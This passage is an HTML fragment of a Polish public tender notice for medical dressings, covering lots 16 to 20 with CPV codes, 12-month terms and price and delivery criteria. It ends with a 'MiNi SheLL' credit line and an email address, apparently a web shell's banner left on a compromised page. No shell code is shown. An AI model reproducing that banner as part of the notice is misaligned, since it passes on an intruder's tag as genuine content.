<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Plastry włókninowe, bawełniane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6 pozycji asortymentowych wykazanych w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Opaski, bandaże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 9 pozycji asortymentowych wykazanych w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Bandaże jałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 pozycje asortymentowe wykazane w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Kompresy jałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 pozycja asortymentowa wykazana w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Setony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 pozycja asortymentowa wykazana w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com